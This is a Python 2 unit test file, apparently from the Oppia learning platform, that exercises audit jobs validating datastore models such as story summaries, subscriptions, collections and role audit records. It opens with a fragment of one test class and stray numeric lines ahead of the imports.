        self.model_instance_0 = story_models.StorySummaryModel.get_by_id('0')
        self.model_instance_1 = story_models.StorySummaryModel.get_by_id('1')
        self.model_instance_2 = story_models.StorySummaryModel.get_by_id('2')
        self.job_class = (
            prod_validation_jobs_one_off.StorySummaryModelAuditOneOffJob)

    def test_standard_operation(self):
        """All three summary models validate cleanly after a normal
        story update.
        """
        story_services.update_story(
            self.owner_id, '1', [story_domain.StoryChange({
                'cmd': 'update_story_property',
                'property_name': 'title',
                'new_value': 'New title',
                'old_value': 'title 0'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated StorySummaryModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated fails the time relation
        check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StorySummaryModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated StorySummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the future (via the mocked clock) fails the
        current time check.
        """
        story_services.delete_story(self.owner_id, '1')
        story_services.delete_story(self.owner_id, '2')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StorySummaryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_model_failure(self):
        """Deleting the backing story fails the story_ids check."""
        story_model = story_models.StoryModel.get_by_id('0')
        story_model.delete(feconf.SYSTEM_COMMITTER_ID, '', [])
        self.model_instance_0.story_model_last_updated = (
            story_model.last_updated)
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for story_ids '
                'field check of StorySummaryModel\', '
                '[u"Entity id 0: based on field story_ids having '
                'value 0, expect model StoryModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated StorySummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_node_count(self):
        """A node_count disagreeing with story_contents fails the node
        count check.
        """
        self.model_instance_0.node_count = 10
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for node count check of '
                'StorySummaryModel\', [u\'Entity id 0: Node count: 10 does '
                'not match the number of nodes in story_contents dict: []\']]'
            ), u'[u\'fully-validated StorySummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_story_related_property(self):
        """A title differing from the story's title fails the title
        field check.
        """
        self.model_instance_0.title = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for title field check of '
                'StorySummaryModel\', '
                '[u\'Entity id %s: title field in entity: invalid does not '
                'match corresponding story title field: title 0\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated StorySummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class UserSubscriptionsModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the UserSubscriptionsModel audit one-off job."""

    def setUp(self):
        """Publishes three explorations and three collections, then
        subscribes a secondary user to a feedback thread, the owner, and
        every activity.
        """
        super(UserSubscriptionsModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        self.owner = user_services.UserActionsInfo(self.owner_id)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i
        ) for i in xrange(3)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
            rights_manager.publish_exploration(self.owner, exp.id)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i
        ) for i in xrange(3, 6)]
        for collection in collections:
            collection_services.save_new_collection(self.owner_id, collection)
            rights_manager.publish_collection(self.owner, collection.id)
        thread_id = feedback_services.create_thread(
            'exploration', 'exp_id', None, 'a subject', 'some text')
        subscription_services.subscribe_to_thread(
            self.user_id, thread_id)
        subscription_services.subscribe_to_creator(self.user_id, self.owner_id)
        for exp in explorations:
            subscription_services.subscribe_to_exploration(
                self.user_id, exp.id)
        for collection in collections:
            subscription_services.subscribe_to_collection(
                self.user_id, collection.id)
        self.process_and_flush_pending_tasks()
        self.job_class = (
            prod_validation_jobs_one_off.UserSubscriptionsModelAuditOneOffJob)

    def test_standard_operation(self):
        """Both users' subscription models validate cleanly."""
        expected_output = [
            u'[u\'fully-validated UserSubscriptionsModel\', 2]']
        run_job_and_check_output(self, expected_output)

    def test_get_external_id_relationship_failure(self):
        """Subscribing to a nonexistent thread fails the
        general_feedback_thread_ids check.
        """
        nonexist_thread_id = 'nonexist_thread_id'
        subscription_services.subscribe_to_thread(
            self.user_id, nonexist_thread_id)
        expected_output = [
            (
                u'[u\'failed validation check for general_feedback_thread_ids '
                'field check of UserSubscriptionsModel\', '
                '[u"Entity id 110211048197157141232: based on '
                'field general_feedback_thread_ids having value '
                'nonexist_thread_id, expect model GeneralFeedbackThreadModel '
                'with id nonexist_thread_id but it doesn\'t exist"]]'),
            u'[u\'fully-validated UserSubscriptionsModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
| 45.437904
| 80
| 0.623512
|
import ast
import datetime
import math
import random
import time
import types
from constants import constants
from core import jobs_registry
from core.domain import collection_domain
from core.domain import collection_services
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import feedback_services
from core.domain import prod_validation_jobs_one_off
from core.domain import rating_services
from core.domain import recommendations_services
from core.domain import rights_manager
from core.domain import story_domain
from core.domain import story_services
from core.domain import subscription_services
from core.domain import topic_domain
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.platform.taskqueue import gae_taskqueue_services as taskqueue_services
from core.tests import test_utils
import feconf
from google.appengine.api import datastore_types
from google.appengine.ext import db
# Platform-specific search service, resolved through the models registry.
gae_search_services = models.Registry.import_search_services()

# Credentials for the secondary (non-owner) user created by several tests.
USER_EMAIL = 'useremail@example.com'
USER_NAME = 'username'
# Reference instant captured at module load; MockDatetime13Hours reports a
# time 13 hours earlier than this.
CURRENT_DATETIME = datetime.datetime.utcnow()

# Storage model modules imported through the registry so tests can create
# and mutate datastore entities directly.
(
    activity_models, audit_models, base_models,
    collection_models, config_models, email_models,
    exp_models, feedback_models, file_models,
    recommendations_models, story_models,
    user_models,) = (
        models.Registry.import_models([
            models.NAMES.activity, models.NAMES.audit, models.NAMES.base_model,
            models.NAMES.collection, models.NAMES.config, models.NAMES.email,
            models.NAMES.exploration, models.NAMES.feedback, models.NAMES.file,
            models.NAMES.recommendations, models.NAMES.story,
            models.NAMES.user]))
# Keep a handle on the genuine datetime class so the patched metaclass can
# still recognise real datetime instances after datetime.datetime is swapped.
OriginalDatetimeType = datetime.datetime


class PatchedDatetimeType(type):
    """Metaclass whose instance check accepts any genuine datetime object."""

    def __instancecheck__(cls, other):
        """Returns True iff `other` is an instance of the real datetime."""
        is_real_datetime = isinstance(other, OriginalDatetimeType)
        return is_real_datetime
class MockDatetime13Hours(datetime.datetime):
    """datetime.datetime replacement whose utcnow() is frozen 13 hours
    before the module-load time, used by the 'last_updated greater than
    current time' tests.
    """

    # Python 2 metaclass hook: isinstance checks against this class also
    # accept genuine datetime objects (see PatchedDatetimeType).
    __metaclass__ = PatchedDatetimeType

    @classmethod
    def utcnow(cls):
        """Returns a fixed instant 13 hours before CURRENT_DATETIME."""
        return CURRENT_DATETIME - datetime.timedelta(hours=13)
def _parse_job_output(output):
    """Parses one-off job output for order-insensitive comparison.

    Args:
        output: list(str). Each entry is the repr of a (key, value) pair
            emitted by the job.

    Returns:
        dict. Maps each key to its value, with list values sorted so that
        comparison ignores ordering within each value.
    """
    output_dict = {}
    for key, value in [ast.literal_eval(item) for item in output]:
        if isinstance(value, list):
            value = sorted(value)
        output_dict[key] = value
    return output_dict


def run_job_and_check_output(
        self, expected_output, sort=False, literal_eval=False):
    """Helper function to run a validation job and check its output.

    Args:
        self: test_utils.GenericTestBase. The calling test case; must have
            a job_class attribute pointing at the one-off job to run.
        expected_output: list(str). The expected output of the job.
        sort: bool. Whether to sort both outputs before comparing.
        literal_eval: bool. Whether to parse both outputs with
            ast.literal_eval and compare them as key -> sorted-value dicts.
    """
    job_id = self.job_class.create_new()
    # The one-off queue must be empty before enqueueing, and contain
    # exactly this job afterwards.
    self.assertEqual(
        self.count_jobs_in_taskqueue(
            taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 0)
    self.job_class.enqueue(job_id)
    self.assertEqual(
        self.count_jobs_in_taskqueue(
            taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
    self.process_and_flush_pending_tasks()
    actual_output = self.job_class.get_output(job_id)
    if literal_eval:
        # Identical normalization for both sides, so the comparison is
        # insensitive to ordering of entries and of list values.
        actual_output_dict = _parse_job_output(actual_output)
        expected_output_dict = _parse_job_output(expected_output)
        self.assertEqual(
            sorted(actual_output_dict.keys()),
            sorted(expected_output_dict.keys()))
        for key in actual_output_dict:
            self.assertEqual(
                actual_output_dict[key], expected_output_dict[key])
    elif sort:
        self.assertEqual(sorted(actual_output), sorted(expected_output))
    else:
        self.assertEqual(actual_output, expected_output)
def update_datastore_types_for_mock_datetime():
    """Registers MockDatetime13Hours in the GAE datastore type maps so
    that properties holding the mocked datetime are validated, packed and
    given the datetime property meaning like a real datetime.
    """
    datastore_types._VALIDATE_PROPERTY_VALUES.update({
        MockDatetime13Hours: datastore_types.ValidatePropertyNothing})
    datastore_types._PACK_PROPERTY_VALUES.update({
        MockDatetime13Hours: datastore_types.PackDatetime})
    datastore_types._PROPERTY_MEANINGS.update({
        MockDatetime13Hours: datastore_types.entity_pb.Property.GD_WHEN})
class MockModel(base_models.BaseModel):
    """Minimal BaseModel subclass used as a stand-in storage model."""
    pass
class MockSnapshotModel(base_models.BaseModel):
    """Minimal snapshot model exposing the commit fields that snapshot
    metadata validation reads.
    """
    # Class-level commit fields shared by all instances.
    commit_type = 'edit'
    commit_cmds = []
class MockBaseModelValidator(prod_validation_jobs_one_off.BaseModelValidator):
    """BaseModelValidator subclass that overrides nothing, used to check
    that the required hooks raise NotImplementedError.
    """
    pass
class MockSummaryModelValidator(
        prod_validation_jobs_one_off.BaseSummaryModelValidator):
    """Summary validator stub with no external id relationships, used to
    exercise the unimplemented-hook error paths.
    """

    @classmethod
    def _get_external_id_relationships(cls, item):
        # No external models to cross-check.
        return {}
class MockSnapshotContentModelValidator(
        prod_validation_jobs_one_off.BaseSnapshotContentModelValidator):
    """Snapshot content validator stub without EXTERNAL_MODEL_NAME, used
    to check that validation requires the model name to be specified.
    """

    @classmethod
    def _get_external_id_relationships(cls, item):
        # No external models to cross-check.
        return {}
class MockSnapshotMetadataModelValidator(
        prod_validation_jobs_one_off.BaseSnapshotMetadataModelValidator):
    """Snapshot metadata validator stub with a single (empty) external
    relationship, used to check that the change-domain-class hook must be
    implemented.
    """

    EXTERNAL_MODEL_NAME = 'external model'

    @classmethod
    def _get_external_id_relationships(cls, item):
        return {
            'external_model_ids': (MockModel, [])
        }
class NotImplementedErrorTests(test_utils.GenericTestBase):
    """Checks that validator base classes raise when required hooks are
    not overridden.
    """

    def setUp(self):
        """Stores a single MockModel instance for the validators to
        process.
        """
        super(NotImplementedErrorTests, self).setUp()
        self.item = MockModel(id='mockmodel')
        self.item.put()

    def test_error_is_raised_if_fetch_external_properties_is_undefined(self):
        """BaseModelValidator.validate requires the external-properties
        hook.
        """
        with self.assertRaises(NotImplementedError):
            MockBaseModelValidator().validate(self.item)

    def test_error_is_get_external_model_properties_is_undefined(self):
        """BaseSummaryModelValidator.validate requires the
        external-model-properties hook.
        """
        with self.assertRaises(NotImplementedError):
            MockSummaryModelValidator().validate(self.item)

    def test_error_is_raised_if_external_model_name_is_undefined(self):
        """Snapshot content validation requires EXTERNAL_MODEL_NAME."""
        with self.assertRaisesRegexp(
            Exception, 'External model name should be specified'):
            MockSnapshotContentModelValidator().validate(self.item)

    def test_error_is_raised_if_get_change_domain_class_is_undefined(self):
        """Snapshot metadata validation requires the change-domain-class
        hook.
        """
        with self.assertRaises(NotImplementedError):
            snapshot_model = MockSnapshotModel(id='mockmodel')
            snapshot_model.put()
            MockSnapshotMetadataModelValidator().validate(snapshot_model)

    def test_error_is_raised_if_entity_classes_to_map_over_is_undefined(self):
        """The audit job itself requires entity_classes_to_map_over."""
        job_class = prod_validation_jobs_one_off.ProdValidationAuditOneOffJob
        with self.assertRaises(NotImplementedError), self.swap(
            jobs_registry, 'ONE_OFF_JOB_MANAGERS', [job_class]):
            job_id = job_class.create_new()
            job_class.enqueue(job_id)
            self.process_and_flush_pending_tasks()
class ActivityReferencesModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ActivityReferencesModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
exploration = exp_domain.Exploration.create_default_exploration(
'1exp', title='title', category='category')
exp_services.save_new_exploration(self.owner_id, exploration)
collection = collection_domain.Collection.create_default_collection(
'1col', title='title', category='category')
collection_services.save_new_collection(self.owner_id, collection)
self.model_instance = (
activity_models.ActivityReferencesModel.get_or_create('featured'))
self.model_instance.activity_references = [{
'type': constants.ACTIVITY_TYPE_EXPLORATION,
'id': '1exp',
}, {
'type': constants.ACTIVITY_TYPE_COLLECTION,
'id': '1col',
}]
self.model_instance.put()
self.job_class = (
prod_validation_jobs_one_off.ActivityReferencesModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [u'[u\'fully-validated ActivityReferencesModel\', 1]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ActivityReferencesModel\', '
'[u\'Entity id featured: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.created_on, self.model_instance.last_updated
)]
run_job_and_check_output(self, expected_output)
def test_model_with_last_updated_greater_than_current_time(self):
expected_output = [(
u'[u\'failed validation check for current time check of '
'ActivityReferencesModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_missing_id_in_activity_references(self):
self.model_instance.activity_references = [{
'type': 'exploration',
}]
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for fetch properties of '
'ActivityReferencesModel\', '
'[u"Entity id featured: Entity properties cannot be fetched '
'completely with the error \'id\'"]]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_type_in_activity_references(self):
self.model_instance.activity_references = [{
'type': 'invalid_type',
'id': '0'
}]
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for domain object check of '
'ActivityReferencesModel\', '
'[u\'Entity id featured: Entity fails domain validation with the '
'error Invalid activity type: invalid_type\']]')]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_id_in_activity_references(self):
self.model_instance.activity_references = [{
'type': 'exploration',
'id': '1col'
}]
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for exploration_ids field check of '
'ActivityReferencesModel\', '
'[u"Entity id featured: based on field exploration_ids having '
'value 1col, expect model ExplorationModel with id 1col but '
'it doesn\'t exist"]]')]
run_job_and_check_output(self, expected_output)
    def test_mock_model_with_invalid_id(self):
        """Checks that an entity whose id does not match the expected
        regex pattern fails the model id check, while the valid entity
        from setUp still validates fully.
        """
        model_instance_with_invalid_id = (
            activity_models.ActivityReferencesModel(id='invalid'))
        model_instance_with_invalid_id.put()
        expected_output = [(
            u'[u\'fully-validated ActivityReferencesModel\', 1]'
        ), (
            u'[u\'failed validation check for model id check of '
            'ActivityReferencesModel\', '
            '[u\'Entity id invalid: Entity id does not match regex pattern\']]'
        )]
        run_job_and_check_output(self, expected_output, sort=True)
class RoleQueryAuditModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the one-off audit job that validates
    RoleQueryAuditModel instances.
    """

    def setUp(self):
        """Creates an admin user and a RoleQueryAuditModel whose id
        follows the expected '<user>.<timestamp>.<intent>.<random>'
        pattern, then points self.job_class at the audit job under test.
        """
        super(RoleQueryAuditModelValidatorTests, self).setUp()
        self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
        admin_model = user_models.UserSettingsModel.get_by_id(self.admin_id)
        admin_model.role = feconf.ROLE_ID_ADMIN
        admin_model.put()
        model_id = '%s.%s.%s.%s' % (
            self.admin_id, int(math.floor(time.time())),
            feconf.ROLE_ACTION_UPDATE, random.randint(0, 1000))
        self.model_instance = audit_models.RoleQueryAuditModel(
            id=model_id, user_id=self.admin_id,
            intent=feconf.ROLE_ACTION_UPDATE, role='c', username='d')
        self.model_instance.put()
        self.job_class = (
            prod_validation_jobs_one_off.RoleQueryAuditModelAuditOneOffJob)
    def test_standard_model(self):
        """Checks that a well-formed model passes all validation checks."""
        expected_output = [u'[u\'fully-validated RoleQueryAuditModel\', 1]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that the time-field relation check fails when
        created_on is later than last_updated.
        """
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of RoleQueryAuditModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance.id, self.model_instance.created_on,
                self.model_instance.last_updated
            )]
        run_job_and_check_output(self, expected_output)
    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that validation fails when last_updated lies in the
        future (mocked datetime runs 13 hours ahead).
        """
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'RoleQueryAuditModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)
    def test_model_with_non_existent_user_id(self):
        """Checks that deleting the referenced user settings model makes
        the user_ids external-model field check fail.
        """
        user_models.UserSettingsModel.get(self.admin_id).delete()
        expected_output = [(
            u'[u\'failed validation check for user_ids field check of '
            'RoleQueryAuditModel\', '
            '[u"Entity id %s: based on field user_ids having value '
            '%s, expect model UserSettingsModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.admin_id, self.admin_id)]
        run_job_and_check_output(self, expected_output)
    def test_model_with_invalid_id(self):
        """Checks that a model id whose user segment does not match the
        regex pattern fails the model id check.
        """
        model_invalid_id = '%s.%s.%s.%s' % (
            'a', int(math.floor(time.time())), feconf.ROLE_ACTION_UPDATE,
            random.randint(0, 1000))
        model_instance_with_invalid_id = audit_models.RoleQueryAuditModel(
            id=model_invalid_id, user_id=self.admin_id,
            intent=feconf.ROLE_ACTION_UPDATE, role='c', username='d')
        model_instance_with_invalid_id.put()
        expected_output = [(
            u'[u\'fully-validated RoleQueryAuditModel\', 1]'
        ), (
            u'[u\'failed validation check for model id check of '
            'RoleQueryAuditModel\', '
            '[u\'Entity id %s: Entity id does not match regex pattern\']]'
        ) % model_invalid_id]
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the one-off audit job that validates
    CollectionModel instances and their related models.
    """

    def setUp(self):
        """Creates six explorations and three collections (two
        explorations per collection, ids assigned by index), with
        language codes ['ar', 'en', 'en'], and caches the three
        CollectionModel instances plus the job class under test.
        """
        super(CollectionModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        language_codes = ['ar', 'en', 'en']
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
            language_code=language_codes[i]
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            # Collection i references explorations 2i and 2i+1.
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            collection_services.save_new_collection(self.owner_id, collection)
        self.model_instance_0 = collection_models.CollectionModel.get_by_id('0')
        self.model_instance_1 = collection_models.CollectionModel.get_by_id('1')
        self.model_instance_2 = collection_models.CollectionModel.get_by_id('2')
        self.job_class = (
            prod_validation_jobs_one_off.CollectionModelAuditOneOffJob)
    def test_standard_operation(self):
        """Checks that all three collections validate fully after a
        routine title update.
        """
        collection_services.update_collection(
            self.owner_id, '0', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        expected_output = [
            u'[u\'fully-validated CollectionModel\', 3]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that the time-field relation check fails when
        created_on is later than last_updated.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(
            feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of CollectionModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance_0.id,
                    self.model_instance_0.created_on,
                    self.model_instance_0.last_updated
                ),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that validation fails when last_updated lies in the
        future (mocked datetime runs 13 hours ahead). The other two
        collections are deleted so only one entity is reported.
        """
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_collection_schema(self):
        """Checks that domain validation fails for collection 0 when its
        language code ('ar' from setUp) is removed from the list of
        allowed language codes.
        """
        expected_output = [
            (
                u'[u\'failed validation check for domain object check of '
                'CollectionModel\', '
                '[u\'Entity id %s: Entity fails domain validation with the '
                'error Invalid language code: %s\']]'
            ) % (self.model_instance_0.id, self.model_instance_0.language_code),
            u'[u\'fully-validated CollectionModel\', 2]']
        with self.swap(
            constants, 'ALL_LANGUAGE_CODES', [{
                'code': 'en', 'description': 'English'}]):
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_exploration_model_failure(self):
        """Checks that deleting a referenced exploration makes the
        exploration_ids field check fail for the owning collection.
        """
        exp_models.ExplorationModel.get_by_id('1').delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for '
                'exploration_ids field check of CollectionModel\', '
                '[u"Entity id 0: based on field exploration_ids having value '
                '1, expect model ExplorationModel '
                'with id 1 but it doesn\'t exist"]]'
            ),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_collection_commit_log_entry_model_failure(self):
        """Checks that deleting a commit log entry for a collection
        update makes the collection_commit_log_entry_ids check fail.
        """
        collection_services.update_collection(
            self.owner_id, '0', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        collection_models.CollectionCommitLogEntryModel.get_by_id(
            'collection-0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for '
                'collection_commit_log_entry_ids field check of '
                'CollectionModel\', '
                '[u"Entity id 0: based on field '
                'collection_commit_log_entry_ids having value '
                'collection-0-1, expect model CollectionCommitLogEntryModel '
                'with id collection-0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_summary_model_failure(self):
        """Checks that deleting the collection's summary model makes the
        collection_summary_ids field check fail.
        """
        collection_models.CollectionSummaryModel.get_by_id('0').delete()
        expected_output = [
            (
                u'[u\'failed validation check for collection_summary_ids '
                'field check of CollectionModel\', '
                '[u"Entity id 0: based on field collection_summary_ids '
                'having value 0, expect model CollectionSummaryModel with '
                'id 0 but it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_collection_rights_model_failure(self):
        """Checks that deleting the collection's rights model makes the
        collection_rights_ids field check fail.
        """
        collection_models.CollectionRightsModel.get_by_id(
            '0').delete(feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_rights_ids '
                'field check of CollectionModel\', '
                '[u"Entity id 0: based on field collection_rights_ids having '
                'value 0, expect model CollectionRightsModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_metadata_model_failure(self):
        """Checks that deleting the version-1 snapshot metadata model
        makes the snapshot_metadata_ids field check fail.
        """
        collection_models.CollectionSnapshotMetadataModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of CollectionModel\', '
                '[u"Entity id 0: based on field snapshot_metadata_ids having '
                'value 0-1, expect model CollectionSnapshotMetadataModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_content_model_failure(self):
        """Checks that deleting the version-1 snapshot content model
        makes the snapshot_content_ids field check fail.
        """
        collection_models.CollectionSnapshotContentModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of CollectionModel\', '
                '[u"Entity id 0: based on field snapshot_content_ids having '
                'value 0-1, expect model CollectionSnapshotContentModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Unit tests for the one-off audit job that validates
    CollectionSnapshotMetadataModel instances.
    """

    def setUp(self):
        """Creates six explorations and three collections; collection
        '0' is committed by a regular user while the others are
        committed by the owner, so committer-related failures can be
        exercised on '0'. Caches the '<id>-1' snapshot metadata models.
        """
        super(CollectionSnapshotMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            if collection.id != '0':
                collection_services.save_new_collection(
                    self.owner_id, collection)
            else:
                collection_services.save_new_collection(
                    self.user_id, collection)
        self.model_instance_0 = (
            collection_models.CollectionSnapshotMetadataModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            collection_models.CollectionSnapshotMetadataModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            collection_models.CollectionSnapshotMetadataModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .CollectionSnapshotMetadataModelAuditOneOffJob)
    def test_standard_operation(self):
        """Checks that all snapshot metadata models (including the new
        one produced by a title update) validate fully.
        """
        collection_services.update_collection(
            self.owner_id, '0', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        expected_output = [
            u'[u\'fully-validated CollectionSnapshotMetadataModel\', 4]']
        run_job_and_check_output(self, expected_output)
